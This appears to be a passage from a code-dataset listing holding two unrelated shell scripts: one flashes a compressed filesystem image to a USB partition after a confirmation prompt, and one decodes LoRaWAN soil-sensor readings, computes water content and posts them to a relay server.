# - image file <for example imx6-nightly-20150514-0112.ext4fs.xz>
# - usb device <for example /dev/sdc>
IMAGE_FILE=$1
USB_DEVICE=$2
if [ ! -f "$IMAGE_FILE" ]; then
echo "Image file $IMAGE_FILE doesn't exist!"
exit 1
fi
if [ ! -b "$USB_DEVICE" ]; then
echo "Device file $USB_DEVICE doesn't exist!"
exit 1
fi
if [ ! -f /usr/bin/pv ]; then
echo "Please install pv - sudo apt-get install pv"
exit 1
fi
PARTITION=${USB_DEVICE}2
if [ ! -b "$PARTITION" ]; then
echo "Partition $USB_DEVICE doesn't exist!"
exit 1
fi
echo "Going to write $IMAGE_FILE to partition $PARTITION."
echo
echo "Info on the disk, check that it's the correct one:"
echo
udevadm info -n $USB_DEVICE |grep ID_MODEL=
lsblk -f $USB_DEVICE
echo
echo "Press enter to continue, ctrl-C to cancel.."
read
echo "Writing, stand by.."
cat $IMAGE_FILE | xz -d | pv -s 700m | sudo dd of=$PARTITION bs=1M
echo "Checking partition.."
sudo fsck -f $PARTITION
echo "Resizing partition.."
sudo resize2fs $PARTITION
sync
echo
echo "Image written to $PARTITION. You may now remove the device. It's synced already."
| true
|
4c0a94ce63bfd5fe0ba2366e7b29ce80dceb2479
|
Shell
|
dhinilkv956/Libelium
|
/waspmote/Lorawan/soil_monitor data extraction
|
UTF-8
| 2,016
| 2.59375
| 3
|
[] |
no_license
|
#!/bin/bash
tail -n 10 /tmp/dhinil | grep '"deveui":"30-52-bc-32-c8-91-3e-88"' | tail -n 1 > /tmp/30-52-bc-32-c8-91-3e-88_new.txt
diff /tmp/30-52-bc-32-c8-91-3e-88_new.txt /tmp/30-52-bc-32-c8-91-3e-88.txt
result=`echo $?`
cp /tmp/30-52-bc-32-c8-91-3e-88_new.txt /tmp/30-52-bc-32-c8-91-3e-88.txt
data64=`tail -n 1 /tmp/30-52-bc-32-c8-91-3e-88.txt | sed -n -e 's/^.*data":"//p' | cut -f1 -d"," | sed '$s/.$//'`
datahex=`echo "$data64" | base64 -d | hexdump -v -e '/1 "%02x" '`
dphex0=`echo $datahex | cut -c11-18`
echex0=`echo $datahex | cut -c21-28`
sthex0=`echo $datahex | cut -c31-38`
batthex0=`echo $datahex | cut -c7-8`
dphex1=`echo "$dphex0" | sed 's/.\{2\}/&\x/g' | sed 's/^/x/' | sed '$s/.$//' | sed 's#x#/x#g' | tr '/' '\'`
echex1=`echo "$echex0" | sed 's/.\{2\}/&\x/g' | sed 's/^/x/' | sed '$s/.$//' | sed 's#x#/x#g' | tr '/' '\'`
sthex1=`echo "$sthex0" | sed 's/.\{2\}/&\x/g' | sed 's/^/x/' | sed '$s/.$//' | sed 's#x#/x#g' | tr '/' '\'`
dp=`echo -ne "$dphex1" | hexdump -e '1/4 "%f" "\n"'`
ec=`echo -ne "$echex1" | hexdump -e '1/4 "%f" "\n"'`
st=`echo -ne "$sthex1" | hexdump -e '1/4 "%f" "\n"'`
batt=`echo $((16#$batthex0))`
first=`awk -v "a=$dp" 'BEGIN { print 0.0000043 * a * a * a }'`
second=`awk -v "b=$dp" 'BEGIN{print 0.00055 * b * b }'`
third=`awk -v "c=$dp" 'BEGIN{print 0.0292 * c }'`
plus=`awk -v "d=$first" -v "e=$third" 'BEGIN { print d + e }'`
minus=`awk -v "f=$second" 'BEGIN { print f + 0.053 }'`
final=`awk -v "g=$plus" -v "h=$minus" 'BEGIN { print g - h }'`
VWC=`awk -v "i=$final" 'BEGIN { print i * 100 }'`
if [[ $dp =~ ^[+-]?[0-9]+\.?[0-9]*$ || $dp =~ ^[+-]?[0-9]+$ ]] && [[ $ec =~ ^[+-]?[0-9]+\.?[0-9]*$ || $ec =~ ^[+-]?[0-9]+$ ]] && [[ $st =~ ^[+-]?[0-9]+\.?[0-9]*$ || $st =~ ^[+-]?[0-9]+$ ]] && [[ $VWC =~ ^[+-]?[0-9]+\.?[0-9]*$ || $VWC =~ ^[+-]?[0-9]+$ ]] && [[ $result == 1 ]];then
curl -X POST 'http://relay2.saturnmellc.com/soil/data.php?dp='$dp'&ec='$ec'&st='$st'&batt='$batt'&VWC='$VWC''
else
echo $(date) $dp $ec $st $VWC >> /tmp/nonumber.txt
fi
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.